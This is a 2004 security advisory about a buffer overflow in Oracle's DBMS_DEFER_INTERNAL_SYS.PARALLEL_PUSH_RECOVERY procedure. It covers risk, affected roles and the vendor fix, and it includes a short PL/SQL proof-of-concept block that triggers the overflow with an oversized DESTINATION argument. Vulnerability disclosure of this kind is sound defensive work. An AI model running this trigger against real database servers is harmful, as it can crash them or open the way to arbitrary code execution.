|
#31 - Buffer overflow in procedure PARALLEL_PUSH_RECOVERY of DBMS_DEFER_INTERNAL_SYS package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Low
Details:
When PARALLEL_PUSH_RECOVERY procedure is called with a long string in the DESTINATION parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_DESTINATION VARCHAR2(32767);
P_ORIGIN VARCHAR2(32767);
BEGIN
P_DESTINATION := 'longstring';
P_ORIGIN := '';
SYS.DBMS_DEFER_INTERNAL_SYS.PARALLEL_PUSH_RECOVERY(DESTINATION => P_DESTINATION, ORIGIN => P_ORIGIN);
END;
Analysis:
This vulnerability can be exploited by members SYSDBA role and users granted execute permissions on DBMS_DEFER_INTERNAL_SYS package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
